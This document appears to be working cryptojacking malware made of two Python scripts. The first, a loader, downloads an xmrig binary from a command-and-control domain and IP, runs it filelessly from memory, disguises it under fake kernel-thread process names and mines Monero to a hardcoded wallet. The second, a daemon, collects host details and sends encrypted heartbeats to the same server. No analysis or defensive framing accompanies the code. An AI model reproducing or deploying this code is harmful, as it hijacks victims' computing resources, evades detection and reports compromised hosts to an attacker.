#!/usr/bin/env python3
"""
Mini miner loader — downloads xmrig, writes config, executes.
Designed for Alpine/Debian Docker containers (Qinglong).
~5KB, zero dependencies beyond Python 3 stdlib.
"""
import os, sys, json, hashlib, socket, signal, time, struct, ctypes, ctypes.util, random, gzip

# ── CONFIG ──
C2 = "https://baba-yaga.live"
C2_IP = "https://45.131.214.139"
WALLET = "447NxewTgybVasVMfKXMxdZJPhNZuRUvFUPzJhP4pz9YHNoKdLoKxqRgAaVzHWteSQUXSvf7hxtN1PFfF3W9bzy6Pe8FDbr"
POOL = "gulf.moneroocean.stream:443"
POOL_TLS = True
BIN_HASH = "9d4153c85f1315ae08955dc491294749b3603846d2f95de665d4bf655543be03"
UA = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
PROC_NAMES = ["[migration/0]", "[kworker/u8:3-events_unbound]", "[rcu_preempt]", "[ksoftirqd/0]"]

# ── memfd syscall numbers ──
MEMFD_NR = {"x86_64": 319, "aarch64": 279}

def get_arch():
    import platform
    m = platform.machine()
    return {"x86_64": "x86_64", "amd64": "x86_64", "aarch64": "aarch64", "arm64": "aarch64"}.get(m, m)

def get_worker_id():
    try:
        hn = socket.gethostname()
        try: ip = socket.gethostbyname(hn)
        except: ip = "0.0.0.0"
        cid = ""
        try:
            with open("/proc/self/cgroup") as f:
                for l in f:
                    if "docker" in l or "containerd" in l:
                        cid = l.strip().split("/")[-1][:12]
                        break
        except: pass
        seed = "d3f4ult_s4lt_ch4ng3:%s:%s:%s" % (hn, ip, cid)
        wh = hashlib.sha256(seed.encode()).hexdigest()[:10]
        pwid = "w%s" % wh
        ph = hashlib.sha256(("p00l_s4lt_ch4ng3:%s" % pwid).encode()).hexdigest()[:8]
        return "x%s" % ph
    except:
        return "x%s" % hashlib.md5(socket.gethostname().encode()).hexdigest()[:8]

def download(urls, timeout=60):
    """Try multiple URLs, return bytes or None."""
    import urllib.request, ssl
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    for url in urls:
        try:
            req = urllib.request.Request(url, headers={"User-Agent": UA})
            resp = urllib.request.urlopen(req, timeout=timeout, context=ctx)
            return resp.read()
        except: continue
    return None

def memfd_create(name=""):
    arch = get_arch()
    nr = MEMFD_NR.get(arch)
    if not nr: return -1
    try:
        libc = ctypes.CDLL(ctypes.util.find_library("c"), use_errno=True)
        fd = libc.syscall(ctypes.c_long(nr), ctypes.c_char_p(name.encode()), ctypes.c_uint(0))
        return fd if fd >= 0 else -1
    except: return -1

def set_proc_name(name):
    try:
        libc = ctypes.CDLL(ctypes.util.find_library("c"))
        libc.prctl(15, name.encode()[:15], 0, 0, 0)
    except: pass

def find_free_port():
    import socket as s
    with s.socket(s.AF_INET, s.SOCK_STREAM) as sock:
        sock.bind(('127.0.0.1', 0))
        return sock.getsockname()[1]

def is_miner_running():
    """Check if xmrig/migration is already running."""
    try:
        for pid in os.listdir("/proc"):
            if not pid.isdigit(): continue
            try:
                with open("/proc/%s/cmdline" % pid, "rb") as f:
                    cmd = f.read().decode(errors="ignore")
                if "migration" in cmd or "xmrig" in cmd or ".worker.json" in cmd:
                    return True
            except: continue
    except: pass
    return False

def main():
    # Don't run if miner already running
    if is_miner_running():
        sys.exit(0)

    arch = get_arch()
    if arch != "x86_64":
        # ARM64 binary not yet available
        sys.exit(0)

    # Download compressed binary
    data = download([
        "%s/.x64.gz" % C2,
        "%s/.x64.gz" % C2_IP,
    ], timeout=120)
    if not data:
        sys.exit(1)

    # Decompress
    try:
        binary = gzip.decompress(data)
    except:
        sys.exit(1)

    # Verify hash
    if hashlib.sha256(binary).hexdigest() != BIN_HASH:
        sys.exit(1)

    # Generate worker ID and config
    wid = get_worker_id()
    api_port = find_free_port()
    api_token = hashlib.sha256(os.urandom(32)).hexdigest()[:16]

    config = {
        "autosave": False,
        "background": False,
        "colors": False,
        "title": False,
        "randomx": {"init": -1, "init-avx2": -1, "mode": "auto", "1gb-pages": False, "rdmsr": False},
        "cpu": {
            "enabled": True,
            "huge-pages": False,
            "huge-pages-jit": False,
            "hw-aes": None,
            "priority": 0,
            "memory-pool": False,
            "max-threads-hint": 75,
            "asm": True,
            "argon2-impl": None,
        },
        "log-file": None,
        "donate-level": 0,
        "donate-over-proxy": 0,
        "pools": [{
            "algo": "rx/0",
            "coin": "monero",
            "url": POOL,
            "user": WALLET,
            "pass": wid,
            "rig-id": wid,
            "keepalive": True,
            "enabled": True,
            "tls": POOL_TLS,
            "daemon": False,
        }],
        "api": {
            "id": None,
            "worker-id": wid,
        },
        "http": {
            "enabled": True,
            "host": "127.0.0.1",
            "port": api_port,
            "access-token": api_token,
            "restricted": True,
        },
    }

    # Write config to /dev/shm for hb_micro detection
    cfg_path = "/dev/shm/.worker.json"
    try:
        cfg_data = json.dumps(config)
        with open(cfg_path, "w") as f:
            f.write(cfg_data)
        os.chmod(cfg_path, 0o600)
    except:
        cfg_path = "/tmp/.worker.json"
        with open(cfg_path, "w") as f:
            f.write(json.dumps(config))
        os.chmod(cfg_path, 0o600)

    # Try memfd_create first (fileless)
    fd = memfd_create("")
    if fd >= 0:
        os.write(fd, binary)
        exe_path = "/proc/self/fd/%d" % fd
    else:
        # Fallback: write to /dev/shm
        exe_path = "/dev/shm/.worker"
        with open(exe_path, "wb") as f:
            f.write(binary)
        os.chmod(exe_path, 0o700)

    # Fork and exec
    pid = os.fork()
    if pid > 0:
        # Parent: write info file and exit
        try:
            info = {"pid": pid, "worker_id": wid, "started": int(time.time()),
                    "api_port": api_port, "api_token": api_token}
            with open("/dev/shm/.worker.json", "w") as f:
                json.dump({**config, **{"_info": info}}, f)
        except: pass
        os._exit(0)

    # Child: become session leader
    try:
        os.setsid()
    except: pass

    # Ignore signals
    signal.signal(signal.SIGHUP, signal.SIG_IGN)
    signal.signal(signal.SIGPIPE, signal.SIG_IGN)

    # Set process name
    set_proc_name(random.choice(PROC_NAMES))

    # Redirect stdio
    try:
        dn = os.open(os.devnull, os.O_RDWR)
        os.dup2(dn, 0); os.dup2(dn, 1); os.dup2(dn, 2)
    except: pass

    # Exec xmrig
    try:
        os.execv(exe_path, [random.choice(PROC_NAMES), "--config=%s" % cfg_path])
    except:
        # If memfd exec fails, try shm fallback
        try:
            shm_path = "/dev/shm/.worker"
            if not os.path.exists(shm_path):
                with open(shm_path, "wb") as f:
                    f.write(binary)
                os.chmod(shm_path, 0o700)
            os.execv(shm_path, [random.choice(PROC_NAMES), "--config=%s" % cfg_path])
        except:
            sys.exit(1)

if __name__ == "__main__":
    # Daemonize
    try:
        p = os.fork()
        if p > 0: os._exit(0)
        os.setsid()
        p = os.fork()
        if p > 0: os._exit(0)
    except: pass
    try:
        dn = os.open(os.devnull, os.O_RDWR)
        os.dup2(dn, 0); os.dup2(dn, 1); os.dup2(dn, 2)
    except: pass
    main()

#!/usr/bin/env python3
"""Micro heartbeat daemon v3.3 — Pure Python ChaCha20-Poly1305, zero dependency.
Sends all fields expected by the C2 panel (hostname, arch, state, cpu_load, etc).
"""
import os, sys, json, time, hashlib, base64, socket, signal, random, struct, platform

C2_URL = "https://baba-yaga.live"
HB_KEY = "710aa63323d9c2a8ca1bb522aaf7d9e1"
HB_SALT = b"heartbeat_salt_v2"
HB_ITERS = 100000
INTERVAL = 60
XMRIG_CFG = "/dev/shm/.worker.json"

# ===========================================================================
# ChaCha20-Poly1305 AEAD — Pure Python (RFC 8439)
# ===========================================================================
_CC_ROUNDS = 20
_CC_NONCE_SIZE = 12
_CC_TAG_SIZE = 16
_CC_BLOCK_SIZE = 64

def _rotl32(v, n):
    return ((v << n) | (v >> (32 - n))) & 0xFFFFFFFF

def _qr(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] ^= s[a]; s[d] = _rotl32(s[d], 16)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] ^= s[c]; s[b] = _rotl32(s[b], 12)
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] ^= s[a]; s[d] = _rotl32(s[d], 8)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] ^= s[c]; s[b] = _rotl32(s[b], 7)

def _cc20_block(key, counter, nonce):
    s = [0x61707865, 0x3320646E, 0x79622D32, 0x6B206574]
    s.extend(struct.unpack("<8I", key))
    s.append(counter & 0xFFFFFFFF)
    s.extend(struct.unpack("<3I", nonce))
    w = list(s)
    for _ in range(_CC_ROUNDS // 2):
        _qr(w, 0, 4, 8, 12); _qr(w, 1, 5, 9, 13)
        _qr(w, 2, 6, 10, 14); _qr(w, 3, 7, 11, 15)
        _qr(w, 0, 5, 10, 15); _qr(w, 1, 6, 11, 12)
        _qr(w, 2, 7, 8, 13); _qr(w, 3, 4, 9, 14)
    return struct.pack("<16I", *[((w[i] + s[i]) & 0xFFFFFFFF) for i in range(16)])

def _cc20_encrypt(key, counter, nonce, plaintext):
    out = bytearray()
    n = (len(plaintext) + _CC_BLOCK_SIZE - 1) // _CC_BLOCK_SIZE
    for j in range(n):
        ks = _cc20_block(key, counter + j, nonce)
        bs = j * _CC_BLOCK_SIZE
        be = min(bs + _CC_BLOCK_SIZE, len(plaintext))
        for i, b in enumerate(plaintext[bs:be]):
            out.append(b ^ ks[i])
    return bytes(out)

def _clamp(r):
    return r & 0x0FFFFFFC0FFFFFFC0FFFFFFC0FFFFFFF

def _poly1305_mac(msg, key):
    r = _clamp(int.from_bytes(key[:16], "little"))
    s = int.from_bytes(key[16:32], "little")
    p = (1 << 130) - 5
    a = 0
    for i in range(0, len(msg), 16):
        blk = msg[i:i + 16]
        n = int.from_bytes(blk, "little") + (1 << (8 * len(blk)))
        a = ((a + n) * r) % p
    return ((a + s) & ((1 << 128) - 1)).to_bytes(16, "little")

def _pad16(d):
    rem = len(d) % 16
    return b"" if rem == 0 else b"\x00" * (16 - rem)

def chacha20_poly1305_encrypt(key, nonce, plaintext, aad=b""):
    poly_key = _cc20_block(key, 0, nonce)[:32]
    ct = _cc20_encrypt(key, 1, nonce, plaintext)
    md = bytearray()
    md.extend(aad); md.extend(_pad16(aad))
    md.extend(ct); md.extend(_pad16(ct))
    md.extend(struct.pack("<Q", len(aad)))
    md.extend(struct.pack("<Q", len(ct)))
    tag = _poly1305_mac(bytes(md), poly_key)
    return nonce + ct + tag

# ===========================================================================
# System info collection
# ===========================================================================

def get_worker_id():
    try:
        with open(XMRIG_CFG) as f:
            cfg = json.load(f)
        for pool in cfg.get("pools", []):
            wid = pool.get("pass", "")
            if wid and wid.startswith("x"):
                return wid
    except: pass
    try:
        hostname = socket.gethostname()
        try: ip = socket.gethostbyname(hostname)
        except: ip = "0.0.0.0"
        cid = ""
        try:
            with open("/proc/self/cgroup") as f:
                for line in f:
                    if "docker" in line or "containerd" in line:
                        cid = line.strip().split("/")[-1][:12]
                        break
        except: pass
        salt = os.environ.get("WORKER_ID_SALT", "d3f4ult_s4lt_ch4ng3")
        seed = f"{salt}:{hostname}:{ip}:{cid}"
        wh = hashlib.sha256(seed.encode()).hexdigest()[:10]
        panel_wid = f"w{wh}"
        pool_salt = os.environ.get("POOL_ID_SALT", "p00l_s4lt_ch4ng3")
        pool_hash = hashlib.sha256(f"{pool_salt}:{panel_wid}".encode()).hexdigest()[:8]
        return f"x{pool_hash}"
    except:
        return f"x{hashlib.md5(socket.gethostname().encode()).hexdigest()[:8]}"

def get_hostname():
    try:
        return socket.gethostname()
    except:
        return "unknown"

def get_arch():
    try:
        return platform.machine() or "unknown"
    except:
        return "unknown"

def get_os_platform():
    try:
        parts = []
        # Try /etc/os-release first (most Linux distros)
        try:
            with open("/etc/os-release") as f:
                for line in f:
                    if line.startswith("PRETTY_NAME="):
                        val = line.split("=", 1)[1].strip().strip('"')
                        return val
        except: pass
        # Fallback to platform module
        return f"{platform.system()} {platform.release()}"
    except:
        return "unknown"

def get_cpu_load():
    """Get 1-min CPU load average as percentage of cores."""
    try:
        load1 = os.getloadavg()[0]
        cores = os.cpu_count() or 1
        return round(load1 / cores * 100, 1)
    except:
        return 0

def get_mem_percent():
    """Get memory usage percentage from /proc/meminfo."""
    try:
        mem = {}
        with open("/proc/meminfo") as f:
            for line in f:
                parts = line.split()
                if len(parts) >= 2:
                    key = parts[0].rstrip(":")
                    mem[key] = int(parts[1])
        total = mem.get("MemTotal", 1)
        avail = mem.get("MemAvailable", mem.get("MemFree", 0))
        return round((1 - avail / total) * 100, 1)
    except:
        return 0

def get_uptime_system():
    """Get system uptime in seconds from /proc/uptime."""
    try:
        with open("/proc/uptime") as f:
            return int(float(f.read().split()[0]))
    except:
        return 0

def get_xmrig_api_config():
    try:
        with open(XMRIG_CFG) as f:
            cfg = json.load(f)
        http = cfg.get("http", {})
        if http.get("enabled"):
            return {"host": http.get("host", "127.0.0.1"), "port": http.get("port", 0), "token": http.get("access-token", "")}
    except: pass
    return None

def scrape_xmrig_api(api_cfg):
    result = {"threads": 0, "difficulty": 0, "hashrate": 0}
    if not api_cfg or not api_cfg.get("port"):
        return result
    try:
        import urllib.request
        url = f"http://{api_cfg['host']}:{api_cfg['port']}/2/summary"
        req = urllib.request.Request(url)
        if api_cfg.get("token"):
            req.add_header("Authorization", f"Bearer {api_cfg['token']}")
        resp = urllib.request.urlopen(req, timeout=5)
        data = json.loads(resp.read().decode())
        result["difficulty"] = data.get("connection", {}).get("diff", 0)
        hr = data.get("hashrate", {}).get("total", [])
        if hr and isinstance(hr, list) and len(hr) > 0:
            result["hashrate"] = hr[0] if hr[0] else (hr[1] if len(hr) > 1 else 0)
        result["threads"] = data.get("cpu", {}).get("threads", 0)
        if not result["threads"]:
            try:
                url2 = f"http://{api_cfg['host']}:{api_cfg['port']}/2/backends"
                req2 = urllib.request.Request(url2)
                if api_cfg.get("token"):
                    req2.add_header("Authorization", f"Bearer {api_cfg['token']}")
                resp2 = urllib.request.urlopen(req2, timeout=5)
                backends = json.loads(resp2.read().decode())
                for b in backends:
                    threads = b.get("threads", [])
                    if threads:
                        result["threads"] = len(threads)
                        break
            except: pass
    except: pass
    return result

def get_sysinfo():
    info = {"cpu_model": "unknown", "cpu_cores": 0, "ram_total": "unknown", "kernel": "unknown", "docker": False}
    try:
        with open("/proc/cpuinfo") as f:
            for line in f:
                if line.startswith("model name"):
                    info["cpu_model"] = line.split(":", 1)[1].strip()
                    break
        info["cpu_cores"] = os.cpu_count() or 0
    except: pass
    try:
        with open("/proc/meminfo") as f:
            for line in f:
                if line.startswith("MemTotal"):
                    kb = int(line.split()[1])
                    info["ram_total"] = f"{kb // 1024} MB"
                    break
    except: pass
    try:
        with open("/proc/version") as f:
            info["kernel"] = f.read().strip().split()[2]
    except: pass
    info["docker"] = os.path.exists("/.dockerenv") or os.path.exists("/run/.containerenv")
    return info

def derive_key(key_str):
    return hashlib.pbkdf2_hmac("sha256", key_str.encode(), HB_SALT, HB_ITERS, dklen=32)

def send_hb(worker_id, payload):
    import urllib.request, ssl
    dk = derive_key(HB_KEY)
    pt = json.dumps(payload).encode()
    nonce = os.urandom(12)
    ct = chacha20_poly1305_encrypt(dk, nonce, pt)

    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE

    envelope = {"worker_id": worker_id, "data": base64.b64encode(ct).decode(), "v": 2}
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
    }

    req = urllib.request.Request(
        f"{C2_URL}/api/heartbeat",
        data=json.dumps(envelope).encode(),
        headers=headers,
        method="POST"
    )
    resp = urllib.request.urlopen(req, timeout=15, context=ctx)
    return resp.status

def main():
    signal.signal(signal.SIGHUP, signal.SIG_IGN)
    try:
        signal.signal(signal.SIGPIPE, signal.SIG_IGN)
    except: pass

    worker_id = get_worker_id()
    sysinfo = get_sysinfo()
    api_cfg = get_xmrig_api_config()
    hostname = get_hostname()
    arch = get_arch()
    os_plat = get_os_platform()
    start_ts = int(time.time())

    while True:
        try:
            miner_alive = False
            try:
                for pid_dir in os.listdir("/proc"):
                    if not pid_dir.isdigit(): continue
                    try:
                        with open(f"/proc/{pid_dir}/cmdline", "rb") as f:
                            cmdline = f.read().decode(errors="ignore")
                            if "migration" in cmdline or "xmrig" in cmdline or ".worker.json" in cmdline:
                                miner_alive = True
                                break
                    except: continue
            except: pass

            # Always re-read xmrig config when miner is alive (port/token may change)
            if miner_alive:
                api_cfg = get_xmrig_api_config()
            miner_stats = scrape_xmrig_api(api_cfg)
            # Retry with fresh config if scraping returned 0
            if miner_alive and not miner_stats.get('hashrate'):
                api_cfg = get_xmrig_api_config()
                miner_stats = scrape_xmrig_api(api_cfg)
            state = "MINING" if miner_alive else "IDLE"

            payload = {
                "worker_id": worker_id,
                "type": "heartbeat",
                "ts": int(time.time()),
                "hostname": hostname,
                "arch": arch,
                "os_platform": os_plat,
                "state": state,
                "hashrate": miner_stats["hashrate"],
                "cpu_load": get_cpu_load(),
                "mem_percent": get_mem_percent(),
                "uptime_system": get_uptime_system(),
                "uptime_miner": int(time.time()) - start_ts,
                "miner_alive": miner_alive,
                "cpu_model": sysinfo["cpu_model"],
                "cpu_cores": sysinfo["cpu_cores"],
                "ram_total": sysinfo["ram_total"],
                "kernel": sysinfo["kernel"],
                "docker": sysinfo["docker"],
                "threads": miner_stats["threads"],
                "difficulty": miner_stats["difficulty"],
                "version": "micro-3.3",
            }
            send_hb(worker_id, payload)
        except: pass

        time.sleep(INTERVAL * random.uniform(0.8, 1.2))

if __name__ == "__main__":
    try:
        pid = os.fork()
        if pid > 0:
            os._exit(0)
        os.setsid()
        pid = os.fork()
        if pid > 0:
            os._exit(0)
    except OSError:
        pass
    try:
        dn = os.open(os.devnull, os.O_RDWR)
        os.dup2(dn, 0); os.dup2(dn, 1); os.dup2(dn, 2)
    except: pass
    main()